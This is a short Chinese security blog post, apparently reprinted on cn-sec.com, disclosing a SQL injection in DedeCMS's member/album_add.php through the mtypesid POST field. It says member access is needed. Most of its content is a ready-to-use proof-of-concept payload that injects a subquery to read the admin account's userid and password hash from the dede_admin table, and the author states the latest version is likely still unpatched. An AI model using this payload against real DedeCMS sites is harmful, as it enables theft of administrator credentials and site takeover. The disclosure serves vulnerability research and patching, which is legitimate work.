dedecms(织梦)album_add.php sql注入漏洞

没穿底裤 2019年12月31日23:56:09评论335 views字数 357阅读1分11秒阅读模式
摘要

dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的

dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的

漏洞需要会员,所以比较鸡肋啦
发表文章处,post表单的mtypesid可以注入
/dedecmsnew/member/album_add.php

注入POC:
[php]
mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'','','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'
[/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日23:56:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   dedecms(织梦)album_add.php sql注入漏洞https://cn-sec.com/archives/75236.html

发表评论

匿名网友 填写信息